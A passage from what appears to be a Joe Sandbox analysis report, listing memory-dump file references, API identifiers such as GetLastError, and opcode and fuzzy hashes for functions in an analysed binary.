                                  • Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd
                                  Similarity
                                  • API ID: __fread_nolock
                                  • String ID:
                                  • API String ID: 2638373210-0
                                  • Opcode ID: 75e1cb41967dbd8f3e28a5f37b9bbe559fb24053895d28947d5285b765419e71
                                  • Instruction ID: 89cd71e32ce7b8196718c0d4581eb8c42f10a1fee565966ec055724dafd1ebba
                                  • Opcode Fuzzy Hash: 75e1cb41967dbd8f3e28a5f37b9bbe559fb24053895d28947d5285b765419e71
                                  • Instruction Fuzzy Hash: D4512CB0D047499BDB20DF98D985BAEFBB4FF54710F10412DE841AB381D7756A44CBA2
                                  APIs
                                  • GetLastError.KERNEL32(00000000,?,00000000,?,?,?,00000001,00000000,00000000,00000000,00000000,?,008624DE,?,?,?), ref: 00862565
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd
                                  Similarity
                                  • API ID: ErrorLast
                                  • String ID:
                                  • API String ID: 1452528299-0
                                  • Opcode ID: cd4a828aa6f9b3eb9f10f97a01ec6cef8f3101ff3ac85d5b4a202b08009c5f4e
                                  • Instruction ID: bc0fefc959bff6014c5ca34d24eee1ccb4cc8edcdf14f04adbadceca7b099615
                                  • Opcode Fuzzy Hash: cd4a828aa6f9b3eb9f10f97a01ec6cef8f3101ff3ac85d5b4a202b08009c5f4e
                                  • Instruction Fuzzy Hash: 3F012632610508AFCF158F18CC19DAE3B29FF85330B250144F802DB2A1EA71ED419B90
                                  APIs
                                  • GetLastError.KERNEL32(00000000,?,00000000,00000000,?,00861CAE,009653EC,?,?), ref: 0086B03B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd
                                  Similarity
                                  • API ID: ErrorLast
                                  • String ID:
                                  • API String ID: 1452528299-0
                                  • Opcode ID: 8485ed7354970771c4d106af046d6415d45f315c6b5c1aa9231a7c6bb92785e8
                                  • Instruction ID: 41c50a5ac3a04325dbe98c57ddfac51d42776aff941b1dc56d2de077e0413625
                                  • Opcode Fuzzy Hash: 8485ed7354970771c4d106af046d6415d45f315c6b5c1aa9231a7c6bb92785e8
                                  • Instruction Fuzzy Hash: 70E0863300461466CB122BB8DD09FAA3B69FF45754F094024F60CD6062C7348890D7D6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: +$+Inf$-Inf$Inf$NaN$gfff
                                  • API String ID: 0-2743850093
                                  • Opcode ID: 31d94a1118b349884d4d7728be2060542bb5e7da810f5d1ade39abd90e55b844
                                  • Instruction ID: 95c0a0a50a8f63a83b6712a1b02bcda6ae2ec1290fcc2b46d646646e4bc3d160
                                  • Opcode Fuzzy Hash: 31d94a1118b349884d4d7728be2060542bb5e7da810f5d1ade39abd90e55b844
                                  • Instruction Fuzzy Hash: 4972E17190C7818FD716CF28845036BBBE9AFD6344F188B5EE8D69B252DB34C945CB82
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd
                                  Similarity
                                  • API ID: __floor_pentium4
                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                  • API String ID: 4168288129-2761157908
                                  • Opcode ID: 62c7dc3a731738ed6c9da578743a88814739fd9395454d604326ab190bdf1523
                                  • Instruction ID: ccf2a3d71dce447a1c73ac9bac1b1df1d878edd9d5f9f3625884c311c35431cc
                                  • Opcode Fuzzy Hash: 62c7dc3a731738ed6c9da578743a88814739fd9395454d604326ab190bdf1523
                                  • Instruction Fuzzy Hash: 83D23A72E086288FDB65CE28DD407EAB7B5FB44315F1481EAD40DE7244EB78AE858F41
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
